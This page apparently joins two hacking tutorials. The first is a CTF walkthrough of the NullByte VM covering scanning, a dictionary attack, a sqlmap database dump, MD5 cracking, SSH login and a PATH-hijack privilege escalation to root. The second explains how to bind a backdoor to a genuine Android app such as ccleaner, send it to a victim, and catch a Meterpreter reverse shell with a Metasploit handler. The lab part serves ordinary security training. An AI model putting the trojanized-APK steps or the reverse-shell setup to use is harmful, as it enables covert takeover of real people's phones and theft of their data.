Hack the NullByte VM (CTF Challenge)

This is our article of root2boot penetration testing challenge. We will walk through a exploitable framework of NullByte VM. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. We have to find "Proof.txt" and follow the further steps.

WalkThrough

Start off by finding your target.


netdiscover


Our target is 192.168.1.142. And now that we know our target, we will scan it using nmap.

nmap -p-  -A 192.168.1.142


Scanning the IP, we will know that the port number 80, 111, 777, 44607 are open. Please observe here that the service of SSH is forwarded from 22 to 777 port. This port may come in handy in the future to gain access.
Now we will try and open the targeted IP in the browser.


There is a image and a quote on the page. You will find nothing on the page source or otherwise. But there might be something hidden in the image and so, we will read the image using exif tool.
exiftool main.gif


There you will find a comment kzMb5nVYJw. Now this might be a directory and there is no harm in opening it the browser so let's do that.

Our assumption was right as it opened in the browser. But it is asking for a key. And we have no idea what the key is so therefore we will use dictionary attack to find the key using BurpSuite and rockyou.txt.

Through the dictionary attack you will find the key i.e. elite.


Enter the key where it was asking and the following page will open.



It is asking for username now which again we do not know. So, we will find it in its Database using sqlmap. And for this type:
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs


It will give you the name of the databse i.e. seth.  Now further we will find columns and tables and for that type:
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth

Once command executes, it will show you the table name along with column and password as shown:


As a result we have username and password but the password is in MD5 so we need to crack it and there are many online tools to do so. Therefore to crack it go to md5coder.org and give the md5 value there and click on ok and it will show you the original word i.e. omega

Now we will SSH to log in and for that type :
ssh ramses@192.168.1.142 -p 777
And then give omega as password. And you are logged in. As you are now logged in type the following command to see the list of directories:
ls -lsa
Then read .bash_history file by typing:
cat .bash_history
As we found nothing in there, we will move onto /var/www/backup by typing:
cd /var/www/bakcup/
ls -lsa
./procwatch


After much more exploring here and there and after number of useless attempts we had an idea that if we change the path of ps file to sh so that procwatch runs sh file instead of ps. And if we achieve this, we will directly reach root. Therefore, to achieve this we will have to manipulate the environment and for this we will copy the current shell executable (/bin/sh) into /tmp and for this follow the steps below:

cd /tmp
cp /bin/sh /tmp/ps
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
cd /var/www/backup
./procwatch

With us execution of above commands we will enter root and then further type ;

id
cd /root
ls
cat proof.txt

Hack Android Phone using Backdoor Apk



Sometimes in hacking we have to use most genuine way so that victim is surely hacked. These genuine ways are to be used for our advantage. One of the most genuine ways to hack an android phone is to bind original android file to your backdoor-apk. This backdoor-apk is software which helps us to bind original apk file with your virus. Hence, taking all the suspicious away from you.
And for this first you have to execute the following command:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1



Once the command is execution and installation is done then downloads the backdoor-apk from github and for that type:



As the software is downloaded, go to the www.apk4fun.com website and download an original apk file like I downloaded ccleaner. And then copy it in the backdoor-apk folder.
Open it in the terminal and type:
./backdoor-apk.sh ccleaner.apk
As the command runs it will ask you for the payload you want to use and for that select 3 and then it will ask you for lhost and lport and give these respectively.



The above commands will bind the file to the original apk file and will save it to backdoor-apk>original>dist folder.


Now all you have to do is send the file to the victim as he will install it by clicking on next.


And the click on Install to install the app.


This way the app will be downloaded.


Before opening the app,open metasploit and type :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.126
set lport 4444
exploit
After this when you run the app; you will get meterpreter session.